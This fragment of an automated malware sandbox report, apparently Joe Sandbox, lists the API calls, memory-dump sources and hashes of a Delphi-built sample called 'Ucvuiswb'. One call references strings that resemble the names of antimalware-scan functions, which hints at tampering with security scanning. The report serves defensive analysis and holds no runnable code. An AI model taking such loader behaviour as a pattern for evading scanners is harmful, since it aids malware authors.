                                                                                                                              • Part of subcall function 028B7B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2543409266-0
                                                                                                                            • Opcode ID: 4756bdc0b5d9ef01bd0063f18a0fcfd75c41b1502de2b07f706acd42c99af3a8
                                                                                                                            • Instruction ID: 625cc786c17de99813e8d3896983b78a14a3c9c445d66715f984bdfcfd7f5f31
                                                                                                                            • Opcode Fuzzy Hash: 4756bdc0b5d9ef01bd0063f18a0fcfd75c41b1502de2b07f706acd42c99af3a8
                                                                                                                            • Instruction Fuzzy Hash: F201E97C604308AFFF04EB6CD9A1A5EB7B9EB84300F542064A218D3784EE7498008F16
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0bb8bc12a2b80848937b45a5c1f6d8d54f1068f2835436190cb6a20a71cbf92b
                                                                                                                            • Instruction ID: 9a693b08ff896feb26748754e04ba7dc8b6052310bd37e10e07f9bd4a1eb29a5
                                                                                                                            • Opcode Fuzzy Hash: 0bb8bc12a2b80848937b45a5c1f6d8d54f1068f2835436190cb6a20a71cbf92b
                                                                                                                            • Instruction Fuzzy Hash: 1141BFBCD05248DFEF14DF28E49476A77F1FB08324F64845AD818D7284DBB4A891CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(13C81B20,?,00000105), ref: 028A584A
                                                                                                                              • Part of subcall function 028A5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 028A5AAC
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5ACA
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5AE8
                                                                                                                              • Part of subcall function 028A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                              • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                              • Part of subcall function 028A5A90: RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                              • Part of subcall function 028A5A90: RegCloseKey.ADVAPI32(?,028A5B9C,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2796650324-0
                                                                                                                            • Opcode ID: 8a4b19b7324ab4c137f675191953a7ec3a4d1c3d6609a598d8f1dedecf7690e6
                                                                                                                            • Instruction ID: 84e06be41cad6753b4a1aa1c01a8b0a68c90affd47ab032339f2d90c630e8d87
                                                                                                                            • Opcode Fuzzy Hash: 8a4b19b7324ab4c137f675191953a7ec3a4d1c3d6609a598d8f1dedecf7690e6
                                                                                                                            • Instruction Fuzzy Hash: CBE06D79A002248BDB10DE5C88C0A5733D9AB08754F440961EC68CF246D774D9608BD1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,028C1133,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC,ScanString), ref: 028A7E47
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 028A15E2
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028A16A4
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 028A1704
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 396f1b8e2edc35d1dc41e9d49478c49f96c84ec049d1bb6fc95089dca802a917
• Instruction ID: 42388f769e68de88c88002c315efd9d9ed5485b290de7171b05f3af4d317ccf1
• Opcode Fuzzy Hash: 396f1b8e2edc35d1dc41e9d49478c49f96c84ec049d1bb6fc95089dca802a917
• Instruction Fuzzy Hash: 3EE0267D3003006FF7105A3D4D88B12BBC9EB84374F240575F209CB2D1CBA0E8008B24
Uniqueness

Uniqueness Score: -1.00%